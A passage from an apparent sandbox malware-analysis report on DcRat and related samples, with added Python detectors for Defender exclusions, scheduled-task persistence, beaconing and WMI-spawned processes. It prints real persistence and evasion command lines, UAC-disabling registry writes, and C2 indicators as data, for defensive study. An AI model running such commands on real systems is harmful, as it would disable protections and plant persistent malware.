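        r"\b(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", re.I),
    "schtasks_xml_import": re.compile(
        r"\bschtasks(?:\.exe)?\b.*/create\b.*/xml\b", re.I),
    "netsh_firewall_allow": re.compile(
        r"\bnetsh(?:\.exe)?\b.*\bfirewall\b.*\badd\s+allowedprogram\b", re.I),
}

# Quoted or bare Windows drive paths inside the argument string.
PATH_RX = re.compile(r'"([A-Za-z]:\\[^"]*)"|([A-Za-z]:\\\S+)')

# Locations a standard user can write to (assumed list; extend for your estate).
USER_WRITABLE = re.compile(r"\\AppData\\(?:Local|Roaming)\\|\\ProgramData\\|\\Temp\\", re.I)

# Constructed sample: the first four lines are copied from the process lists above,
# the last two are benign controls.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\LbXyTV.exe"',
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LbXyTV" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBBBE.tmp"',
    r'netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe" "chargeable.exe" ENABLE',
    r'"C:\Windows\System32\schtasks.exe" /Query /TN "\Microsoft\Windows\Defrag\ScheduledDefrag"',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Get-Process',
]


def split_image(cmdline):
    """Return (image, args): a leading quoted token, or the first whitespace token."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        if end == -1:
            return cmdline[1:], ""
        return cmdline[1:end], cmdline[end + 1:].strip()
    head, _, tail = cmdline.partition(" ")
    return head, tail.strip()


def arg_paths(args):
    """Drive paths referenced by the arguments, quoted or bare."""
    return [quoted or bare for quoted, bare in PATH_RX.findall(args)]


def classify(cmdline):
    """Match the rules and grade the hit by where the referenced binary lives."""
    image, args = split_image(cmdline)
    rules = [name for name, rx in RULES.items() if rx.search(cmdline)]
    paths = arg_paths(args)
    writable = [p for p in paths if USER_WRITABLE.search(p)]
    if not rules:
        severity = "none"
    elif writable:
        severity = "high"    # evasion/persistence pointed at a user-writable drop
    else:
        severity = "medium"  # same command shape, target under a system path
    return {"image": image, "rules": rules, "paths": paths,
            "user_writable": bool(writable), "severity": severity}


def scan(cmdlines):
    """Return only the command lines that matched at least one rule."""
    hits = []
    for cmdline in cmdlines:
        result = classify(cmdline)
        if result["severity"] != "none":
            hits.append((cmdline, result))
    return hits


if __name__ == "__main__":
    for cmdline, result in scan(SAMPLE_CMDLINES):
        print(result["severity"], result["rules"], result["paths"])
```

In production the command line comes from process-creation telemetry (Sysmon Event ID 1 or Security 4688 with command-line auditing on). Note that `netsh firewall` is the deprecated context; `netsh advfirewall firewall add rule` is the modern equivalent and needs its own rule if you extend this.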
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | doddyfire.linkpc.net | udp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
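Read together, the network tables of behavioral10 (external-IP lookups against checkip.dyndns.org and reallyfreegeoip.org, then a TLS session to api.telegram.org) and behavioral16 (six TCP connections to doddyfire.linkpc.net on port 10000) show two different beaconing profiles against a shared background of Bing and Google PKI traffic. The following is an added example, not part of the report: it parses rows in the table format used above, discards the background noise, and tags each remaining destination by what the pattern suggests. The reference lists (IP-lookup services, dynamic-DNS suffixes, messaging APIs, background domains) and the beacon threshold are assumptions; the sample rows are copied from the two tables.

```python
import re
from collections import defaultdict

# One table row: | Country | ip:port | Domain | Proto |
ROW_RX = re.compile(
    r"^\|\s*(\w{2})\s*\|\s*([\d.]+):(\d+)\s*\|\s*([^|]*?)\s*\|\s*(tcp|udp)\s*\|$", re.I)

# Assumed reference lists; tune to your environment.
IP_LOOKUP = {"checkip.dyndns.org", "reallyfreegeoip.org", "api.ipify.org", "ip-api.com"}
DYNDNS_SUFFIXES = (".linkpc.net", ".no-ip.com", ".no-ip.org", ".ddns.net", ".duckdns.org")
MESSAGING_APIS = {"api.telegram.org", "discord.com", "discordapp.com"}
BACKGROUND = (".bing.com", ".bing.net", "c.pki.goog")   # sandbox/OS noise
STANDARD_PORTS = {"53", "80", "443"}
BEACON_MIN_CONNECTIONS = 2

# Constructed input: rows copied from the behavioral10 and behavioral16 tables above.
SAMPLE_TABLE = """\
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| US | 158.101.44.242:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.48.1:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | doddyfire.linkpc.net | udp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
| MA | 196.119.34.23:10000 | doddyfire.linkpc.net | tcp |
"""


def parse_rows(text):
    """Turn table rows into dicts; rows without a domain are keyed by IP."""
    rows = []
    for line in text.splitlines():
        m = ROW_RX.match(line.strip())
        if m:
            country, ip, port, domain, proto = m.groups()
            rows.append({"country": country, "ip": ip, "port": port,
                         "domain": domain or ip, "proto": proto.lower()})
    return rows


def tags_for(domain, tcp_ports, tcp_count):
    tags = []
    if domain in IP_LOOKUP:
        tags.append("external_ip_lookup")          # victim geolocation / IP reporting
    if domain.endswith(DYNDNS_SUFFIXES):
        tags.append("dynamic_dns")                 # operator-controlled, cheap to rotate
    if domain in MESSAGING_APIS:
        tags.append("messaging_api")               # legitimate API used as exfil channel
    if tcp_count >= BEACON_MIN_CONNECTIONS and (tcp_ports - STANDARD_PORTS):
        tags.append("nonstandard_port_beacon")     # repeated sessions, odd port
    return tags


def triage(rows):
    """Group connections per destination and keep the ones that earn a tag."""
    by_domain = defaultdict(list)
    for row in rows:
        by_domain[row["domain"]].append(row)
    report = {}
    for domain, conns in by_domain.items():
        if domain.endswith(BACKGROUND):
            continue
        tcp = [c for c in conns if c["proto"] == "tcp"]
        tcp_ports = {c["port"] for c in tcp}
        tags = tags_for(domain, tcp_ports, len(tcp))
        if tags:
            report[domain] = {"ips": sorted({c["ip"] for c in tcp}),
                              "ports": sorted(tcp_ports, key=int),
                              "tcp_connections": len(tcp), "tags": tags}
    return report


if __name__ == "__main__":
    for domain, info in triage(parse_rows(SAMPLE_TABLE)).items():
        print(domain, info)
```

The same grouping works on Sysmon Event ID 3 or firewall logs once the rows are mapped to the same five fields. The distinction that matters operationally: the IP-lookup and Telegram destinations are shared infrastructure you block or alert on by URL or bot token, whereas the linkpc.net host and 196.119.34.23:10000 are indicators specific to this operator.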
Files
memory/3344-0-0x00000000749D2000-0x00000000749D3000-memory.dmp
memory/3344-1-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/3344-2-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/3344-7-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/3344-6-0x00000000749D2000-0x00000000749D3000-memory.dmp
C:\Users\Admin\AppData\Roaming\confuse\chargeable.exe
| MD5 | 9c128ec6111b20f64d7dd0d7cbc1261f |
| SHA1 | e3572f7846f7411a5680677dc2dc065740874a39 |
| SHA256 | 2736418dd3b86592668eb3a2057b6cd4048739d23754a7519e394677ef955181 |
| SHA512 | 046e35d22185d04f4be1fe9f737c9d0c97073ba1f4cdbd092cda444cf1c166b41b62033e8fed7fc3b98901f73bcc1850b0d7957d5c848f8278cc066eb9d8c90c |
memory/976-22-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/976-21-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/976-20-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/3344-19-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/5024-31-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/5024-33-0x00000000749D0000-0x0000000074F81000-memory.dmp
memory/976-32-0x00000000749D0000-0x0000000074F81000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\chargeable.exe.log
| MD5 | 0a9b4592cd49c3c21f6767c2dabda92f |
| SHA1 | f534297527ae5ccc0ecb2221ddeb8e58daeb8b74 |
| SHA256 | c7effe9cb81a70d738dee863991afefab040290d4c4b78b4202383bcb9f88fcd |
| SHA512 | 6b878df474e5bbfb8e9e265f15a76560c2ef151dcebc6388c82d7f6f86ffaf83f5ade5a09f1842e493cb6c8fd63b0b88d088c728fd725f7139f965a5ee332307 |
memory/5024-23-0x0000000000400000-0x000000000040C000-memory.dmp
memory/5024-34-0x00000000749D0000-0x0000000074F81000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
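Twelve schtasks.exe launches with wmiprvse.exe as the parent is the signature of a sample creating its scheduled tasks through WMI rather than by calling schtasks directly: the process tree then ends at the WMI provider host and its svchost.exe parent, and the real initiator never appears in the parent chain. The following is an added example, not part of the report: it builds a process tree from creation events, reports children whose parent is outside an expected-parent allowlist, walks the ancestry so the analyst sees where the chain dead-ends, and counts repeats so a burst like the one above surfaces as one finding. The allowlist and the process records (PIDs invented) are assumptions modelled on the signature table.

```python
import ntpath
from collections import Counter, namedtuple

Proc = namedtuple("Proc", "pid ppid image")

# Assumed allowlist of parents that legitimately launch each child; anything else is
# reported. wmiprvse.exe is deliberately absent for schtasks.exe.
EXPECTED_PARENTS = {
    "schtasks.exe": {"cmd.exe", "explorer.exe", "powershell.exe", "msiexec.exe", "svchost.exe"},
    "powershell.exe": {"cmd.exe", "explorer.exe", "powershell.exe", "svchost.exe"},
}

# Constructed process telemetry (PIDs invented) modelled on the signature above.
SAMPLE_PROCS = [
    Proc(700, 1, r"C:\Windows\system32\svchost.exe"),            # DcomLaunch host
    Proc(2100, 700, r"C:\Windows\system32\wbem\wmiprvse.exe"),   # WMI provider host
    Proc(3301, 2100, r"C:\Windows\system32\schtasks.exe"),       # spawned through WMI
    Proc(3302, 2100, r"C:\Windows\system32\schtasks.exe"),
    Proc(3303, 2100, r"C:\Windows\system32\schtasks.exe"),
    Proc(1500, 1, r"C:\Windows\explorer.exe"),
    Proc(1600, 1500, r"C:\Windows\system32\cmd.exe"),
    Proc(1700, 1600, r"C:\Windows\system32\schtasks.exe"),       # interactive, benign
]


def basename(image):
    return ntpath.basename(image).lower()


def ancestry(tree, pid):
    """Image names from the process up to the first parent not in the telemetry."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)               # guard against PID reuse making a loop
        chain.append(basename(tree[pid].image))
        pid = tree[pid].ppid
    return chain


def find_anomalies(procs):
    """Children launched by a parent outside EXPECTED_PARENTS."""
    tree = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        child = basename(p.image)
        if child not in EXPECTED_PARENTS or p.ppid not in tree:
            continue
        parent = basename(tree[p.ppid].image)
        if parent not in EXPECTED_PARENTS[child]:
            findings.append({"pid": p.pid, "child": child, "parent": parent,
                             "chain": ancestry(tree, p.pid)})
    return findings


def summarize(findings):
    """Collapse repeats into (parent, child) -> count, as in the twelve rows above."""
    return Counter((f["parent"], f["child"]) for f in findings)


if __name__ == "__main__":
    found = find_anomalies(SAMPLE_PROCS)
    for f in found:
        print(f["pid"], " <- ".join(f["chain"]))
    print(dict(summarize(found)))
```

Because the chain stops at svchost.exe, attributing the task creation to the sample requires a second source: the WMI activity log, or the scheduled-task creation events themselves, correlated by time with the sample's own process.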
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SchCache\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| File created | C:\Windows\SchCache\9e8d7a4ca61bd9 | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| File opened for modification | C:\Windows\SchCache\RCX6C0E.tmp | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| File opened for modification | C:\Windows\SchCache\RCX6C8C.tmp | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| File opened for modification | C:\Windows\SchCache\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SchCache\RuntimeBroker.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe
"C:\Users\Admin\AppData\Local\Temp\1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office\root\Client\Registry.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\root\Client\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office\root\Client\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
